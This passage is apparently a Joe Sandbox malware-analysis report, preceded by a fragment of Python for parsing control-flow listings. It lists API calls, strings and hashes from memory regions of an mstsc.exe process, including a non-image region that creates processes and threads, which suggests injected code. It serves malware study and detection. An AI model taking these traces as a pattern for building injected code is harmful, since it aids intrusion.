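    for name, line in (("CreateProcess", CFG_CREATEPROCESS), ("SleepLoop", CFG_SLEEP_LOOP)):
        blocks, succs = parse_cfg(line)
        print(name, "entry", entry_block(blocks, succs), "apis", api_blocks(blocks),
              "loops", loops_with_apis(line))
```

On the Sleep-loop listing this reports a single loop headed by block 437 whose body contains the Sleep call; on the CreateProcessInternalW listing it reports no loop and places RtlAllocateHeap in block 403 and CreateProcessInternalW in block 408, matching the `ref:` addresses in the APIs lists.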
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A66D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: 2d4e0817c8443f903ef1c354f06224df46c0b170937f898928bd2ea31fb41516
• Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction Fuzzy Hash: A6E04FB12102046BDB14DF99CC45EE777ACEF88750F014555FD0857242C630F910CAF0
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A66D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 011d5a14d079758ec468c3849b5b85ce3b556b499b037ab08ca49e9c6007fa1e
                                                                                                                                                                                    • Instruction ID: f0762f8310357d90e4027381f6dee2d434ca31901bfa9d77c0ceea947eb697ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 011d5a14d079758ec468c3849b5b85ce3b556b499b037ab08ca49e9c6007fa1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0D8FA1241815BEB04DF68E4D14DB37D9AF813143144656E85887A07C920D42687B1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: a839e97628358e384e86f27fcf2c3254b7c81eb0bddbc990150e9bc55a9e7a7a
                                                                                                                                                                                    • Instruction ID: 1b572216d59a89b5750021fd673db15974259d9ed9f4689e4815fba4e4e70c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: a839e97628358e384e86f27fcf2c3254b7c81eb0bddbc990150e9bc55a9e7a7a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3451C3B1900309AFDB24EF64DC89BEB77E8FB49704F10456DF58997242DB70AA41CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: b1954f81e1ed0db928e503ff36089c768fc0449b4f3a75a61ea9935423ce3b62
                                                                                                                                                                                    • Instruction ID: 86a6eb4ec18d7345696a5e2ec7f04f44f36d12713519dd256cffb75137398564
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1954f81e1ed0db928e503ff36089c768fc0449b4f3a75a61ea9935423ce3b62
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1111E531A4022877EF20B6A4AC03FEE775CAB41F54F480155FA44BA1C3EA946A0683E6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                    • Instruction ID: 339310e7816ee6677ed71e26b38aa137091c1f5ceb856f159559ed380170ccdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6018431A8022877EB20B6949C03FFE776C6B41F50F044115FF44BA1C2EAD46A0647E6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: fa568aef906adbc91e2322c64b61688136974792ac46f5f4ca0df15262e431cf
                                                                                                                                                                                    • Instruction ID: be3cbddd8df2ed4e7fc770453fdcd05093ef6983cf3d8f42e5ace0f2c7fe1c3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa568aef906adbc91e2322c64b61688136974792ac46f5f4ca0df15262e431cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01AFB2211108AFCB54DF89DC80EEB77ADAF8C754F158258FA4D97245C630E951CBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction ID: 19f9a99672ba2ac00871b2559056ee1503211ea5923d2fde956d3060091d1159
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991BC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                    • Opcode ID: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                                                                                                                                                                    • Instruction ID: 7778cbb052deaf6c9d160f9307f3b1362cc7e025e829842f923fdde3f9a57666
                                                                                                                                                                                    • Opcode Fuzzy Hash: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E092373903043AEB30659DAC03FE7B39CDB81B25F14002AFA4DEB2C2D595F80142A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction ID: 503748e752a4dd667a2f48f6c13857ae90e473f5abbcc737b5c6dd4122f84ac3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E01AB12102086BDB10DF89CC85EEB37ADAF89750F018165BA0857242C930E8118BF5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6FB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                    • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                    • Instruction ID: ed2a3b96cedebc315b72bcabaabe6c3ce6085ee93f5df0a30e066fe22c75f057
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D0A7717503093BEB10FAA49C03F6632CCAB45B04F490074F948D73C3ED50F4014165
APIs
• EndDialog.USER32 ref: 0093DF1B
• GetCursorPos.USER32(?), ref: 0093DF45
• ScreenToClient.USER32(?,?), ref: 0093DF56
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0093DF70
• SendMessageW.USER32(?,00001127,?,0000F000), ref: 0093DF8A
• SendMessageW.USER32(?,0000110A,00000003,?), ref: 0093DFB2
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0093DFE5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageSend$ClientCursorDialogScreen
• String ID: @
• API String ID: 517287251-2766056989
APIs
• lstrcmpiW.KERNEL32(?,Delete,?,?,00000000,00000000,?,00912849,?,00000000,00000000,00000000,?), ref: 009121C5
• lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,00912849,?,00000000,00000000,00000000,?), ref: 009121DA
• RegCloseKey.ADVAPI32(00000000), ref: 009126E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: lstrcmpi$Close
• String ID: Delete$ForceRemove$NoRemove$Val
• API String ID: 1559394795-1781481701
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00919B4E
• IsIconic.USER32(?), ref: 00919C42
• GetClientRect.USER32(?,?,?), ref: 00919CDA
• VariantClear.OLEAUT32(?), ref: 00919F0B
• CheckMenuItem.USER32 ref: 00919FCF
• GetLastError.KERNEL32 ref: 00919D0B
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Strings
• put_FullScreen failed!, xrefs: 00919AC1, 00919BCF, 00919C85
• ShowSessionDiagnostics, xrefs: 00919EBE
• QueryInterface failed for IMsRdpExtendedSettings, xrefs: 00919E74, 0091A1F2
• put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!, xrefs: 00919EE4
• put_FullScreen(VARIANT_TRUE) failed!, xrefs: 0091A14D
• HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON, xrefs: 0091A055
• ShowGatewayInformation, xrefs: 0091A231
• mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6, xrefs: 0091A05A
• put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!, xrefs: 0091A267
• SyncSessionDisplaySettings failed!, xrefs: 00919B21
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Proc$AddressCheckClearClientErrorFreeHandleIconicItemLastLibraryMenuMessageModuleRectTraceVariantWindow
• String ID: HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$QueryInterface failed for IMsRdpExtendedSettings$ShowGatewayInformation$ShowSessionDiagnostics$SyncSessionDisplaySettings failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6$put_FullScreen failed!$put_FullScreen(VARIANT_TRUE) failed!$put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!$put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!
• API String ID: 1785777579-2258313333
APIs
• memset.MSVCRT ref: 009569DC
• CertFreeCertificateChain.CRYPT32(00000000,?,?,?,?,00000000,?), ref: 00956CF6
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Strings
• attempt to sign with missing certificate/data, xrefs: 00956D20
• 1.3.14.3.2.26, xrefs: 00956B6A
• pbSignedBlob, xrefs: 00956C15
• D, xrefs: 00956B39
• Unable to construct cert chain for signing, xrefs: 00956AA1
• attempt to sign with invalid signer certificate, xrefs: 00956A41
• CertChainContextToArray failed, xrefs: 00956B07
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Free$AddressCertCertificateChainHandleLibraryModuleProcmemset
• String ID: 1.3.14.3.2.26$CertChainContextToArray failed$D$Unable to construct cert chain for signing$attempt to sign with invalid signer certificate$attempt to sign with missing certificate/data$pbSignedBlob
• API String ID: 2430148879-1874413065
APIs
• LoadCursorW.USER32 ref: 0091C8FB
• SetCursor.USER32(00000000), ref: 0091C902
• DefWindowProcW.USER32(?,00000117,?,?), ref: 0091CBA6
• IsIconic.USER32(?), ref: 0091CC41
  • Part of subcall function 009188BF: IsIconic.USER32(?), ref: 00918904
  • Part of subcall function 009188BF: GetWindowPlacement.USER32(?,?), ref: 00918915
  • Part of subcall function 009188BF: GetLastError.KERNEL32 ref: 0091891F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: CursorIconicWindow$ErrorLastLoadPlacementProc
• String ID: ,$FALSE$HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$SyncSessionDisplaySettings failed$TRUE$e$get_RemoteMonitorCount failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6
• API String ID: 1251360991-567463105
APIs
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
• LockWindowUpdate.USER32(?), ref: 0091B460
• IsIconic.USER32(?), ref: 0091B48C
• GetWindowPlacement.USER32(?,?), ref: 0091B49E
• GetWindowLongW.USER32(?,000000F0), ref: 0091B4C3
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0091B4DA
• SetWindowLongW.USER32(?,000000F4,00000000), ref: 0091B4E3
• ShowWindow.USER32(?,00000009), ref: 0091B5B5
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000030), ref: 0091B5E3
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000215), ref: 0091B5F8
• LockWindowUpdate.USER32(00000000), ref: 0091B5FB
  • Part of subcall function 0092426E: CopyRect.USER32(?,?), ref: 009242C6
Strings
• get_RemoteMonitorLayoutMatchesLocal failed!, xrefs: 0091B43D
• ,, xrefs: 0091B484
• get_RemoteMonitorCount failed!, xrefs: 0091B3E6
                                                                                                                                                                                    • QI for IID_IMsRdpClientNonScriptable5 failed!, xrefs: 0091B37F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long$LockUpdate$AddressCopyFreeHandleIconicLibraryModulePlacementProcRectShow
                                                                                                                                                                                    • String ID: ,$QI for IID_IMsRdpClientNonScriptable5 failed!$get_RemoteMonitorCount failed!$get_RemoteMonitorLayoutMatchesLocal failed!
                                                                                                                                                                                    • API String ID: 151203323-4160434392
                                                                                                                                                                                    • Opcode ID: 069787be98385cc8febc9545d633e3c05a6ce45fb7bafa54c00c51c54c97f10f
                                                                                                                                                                                    • Instruction ID: b06401a8cd61fe8ba69694bba3f636fa0182d42a7e3fb9fe2a2244420de85f04
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069787be98385cc8febc9545d633e3c05a6ce45fb7bafa54c00c51c54c97f10f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7391CF71608304AFDB14DF21C889B6ABBEAFFC8314F14895DF9559B2A1DB70D881CB52
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0095C43C
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0095C485
                                                                                                                                                                                    • ProcessIdToSessionId.KERNEL32(00000000), ref: 0095C48C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095C496
                                                                                                                                                                                    • RpcBindingFree.RPCRT4(?), ref: 0095CA17
                                                                                                                                                                                      • Part of subcall function 0095F7B6: DeleteCriticalSection.KERNEL32(?,?), ref: 0095F7EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$BindingCriticalCurrentDeleteErrorFreeLastSectionSessionmemset
                                                                                                                                                                                    • String ID: RpcShadow2 failed$SetTitle failed
                                                                                                                                                                                    • API String ID: 69563327-3302378902
                                                                                                                                                                                    • Opcode ID: 2042c5ab4f53328af3dd4ae3e9b6fd916e2d06352b6b3982f301e67e317bf55f
                                                                                                                                                                                    • Instruction ID: d0f17ecdb494037a2e74c4c0722bac5481396a0b10df442c6dcd9f24de42b7f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2042c5ab4f53328af3dd4ae3e9b6fd916e2d06352b6b3982f301e67e317bf55f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE1E0F1A04355AFCB26CF16CC54FAA3BAABB49301F05409DEA04AB261D774DD88DF45
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptVerifyDetachedMessageSignature.CRYPT32(?,00000000,?,?,00000001,?), ref: 009571F3
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00957203
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00957237
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00957263
                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000,0091396B,00000000,00000000,insufficient number of signature verification parameters), ref: 00957392
                                                                                                                                                                                    • CertFreeCertificateChain.CRYPT32(?,0091396B,00000000,00000000,insufficient number of signature verification parameters), ref: 0095739D
                                                                                                                                                                                    • CertCloseStore.CRYPT32(?,00000000), ref: 009573AE
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SetCertificate failed, xrefs: 00957313
                                                                                                                                                                                    • insufficient number of signature verification parameters, xrefs: 00957360
                                                                                                                                                                                    • VerifySignature failed, xrefs: 00957192
                                                                                                                                                                                    • ValidateCertificate failed, xrefs: 009572C3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertErrorFreeLast$CertificateMessage$AddressChainCloseContextCryptDetachedHandleLibraryModuleProcSignatureStoreTraceVerify
                                                                                                                                                                                    • String ID: SetCertificate failed$ValidateCertificate failed$VerifySignature failed$insufficient number of signature verification parameters
                                                                                                                                                                                    • API String ID: 1801278590-3790569485
                                                                                                                                                                                    • Opcode ID: c4507d37b61c4a3e3457fb7f3d432abbd00df3adae5a8b73a9bf194b81a4c1b4
                                                                                                                                                                                    • Instruction ID: 75e6434e3f9380a95685214c750a7fd4ebe369900788e1e35e579e500f18f505
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4507d37b61c4a3e3457fb7f3d432abbd00df3adae5a8b73a9bf194b81a4c1b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: D361C53151C341AFD725CF96F849F66BBEAAB84321F044459FC84A71A2C770CE48EB52
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000044), ref: 0095CA60
                                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000016,00000000,00000000,?), ref: 0095CABA
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095CAC4
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0095CCC5
                                                                                                                                                                                    • RpcBindingFree.RPCRT4(00000000), ref: 0095CCD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$Local$AddressAllocBindingCreateErrorHandleKnownLastLibraryMessageModuleProcTraceWell
                                                                                                                                                                                    • String ID: CShadowRpcUtils::s_Bind failed$CShadowRpcUtils::s_BindSecure failed$SessEnvPrivateRpc$ncalrpc
                                                                                                                                                                                    • API String ID: 105258157-1822820735
                                                                                                                                                                                    • Opcode ID: 05124cdd2f7a9c359764db67e3bac624ea19160cf5f3697a91aef048e846a3d2
                                                                                                                                                                                    • Instruction ID: 04d118926496a20373840d03bd373acc84c55dd94da76f392fefe84f885a2ca5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 05124cdd2f7a9c359764db67e3bac624ea19160cf5f3697a91aef048e846a3d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD8126B2904304AFDB25CF56C849F7A7AE9EB49312F11488DFD44AB2A1C674CC48EB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,00000000,0096A020), ref: 0092399C
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00923A08
